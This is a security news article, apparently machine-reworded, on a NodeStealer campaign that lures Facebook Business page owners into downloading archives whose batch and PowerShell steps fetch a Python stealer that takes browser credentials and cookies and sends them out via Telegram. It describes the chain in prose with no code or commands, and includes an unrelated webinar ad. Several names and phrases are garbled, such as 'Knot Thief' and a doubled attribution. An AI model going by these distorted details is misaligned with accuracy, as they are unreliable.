An ongoing campaign targets Facebook Business accounts with fake messages to harvest victims’ identifying information using a variation of the Python-based system. Knot Thief and potentially take over their accounts for subsequent malicious activity.
“The attacks are affecting victims mainly in southern Europe and North America, in different segments, led by the manufacturing services and technology sectors,” said Jan Michael, researcher at Netskope Threat Labs. said in an analysis published Thursday.
Palo Alto Networks Unit 42 last month revealed a separate attack wave that took place in December 2022 using a Python version of the malware, with selected iterations also designed to carry out the theft of cryptocurrency.
Netskope’s latest findings suggest that the Vietnamese actors behind the operation have likely resumed their attack efforts, not to mention adopting tactics used by other adversaries operating outside the country with the same objectives.
Earlier this week, Guardio Labs revealed how fraudulent messages sent via Facebook Messenger from a botnet of fake and hacked personal accounts were being exploited to transmit ZIP or RAR archive files to deliver the stealing malware to unsuspecting recipients.
The same modus operandi serves as the initial vector for NodeStealer intrusion chains to distribute RAR files hosted on Facebook’s Content Delivery Network (CDN).
“Images of defective products were used as bait to convince owners or administrators of Facebook business pages to download the malware payload,” Michael explained.
Identity is the New Endpoint: Mastering SaaS Security in the Modern Age
Dive into the future of SaaS security with Maor Bin, CEO of Adaptive Shield. Find out why identity is the new endpoint. Reserve your place now.
These archives come equipped with a batch script which, when executed, opens the Chrome web browser and takes the victim to a harmless web page. But in the background, a PowerShell command is run to fetch additional payloads, including the Python interpreter and NodeStealer malware.
The thief, in addition to capturing credentials and cookies – whether from Facebook or not – from various web browsers, is designed to collect system metadata and exfiltrate the information through Telegram.
“Compared to previous variants, the new NodeStealer variant uses batch files to download and run Python scripts, and steal credentials and cookies from multiple browsers and multiple websites,” Michael said.
“This campaign could be a gateway to a more targeted attack later since they have already collected useful information. Attackers who stole Facebook’s cookies and credentials can use them to take control of the account and carry out fraudulent transactions by exploiting the legitimate business page.”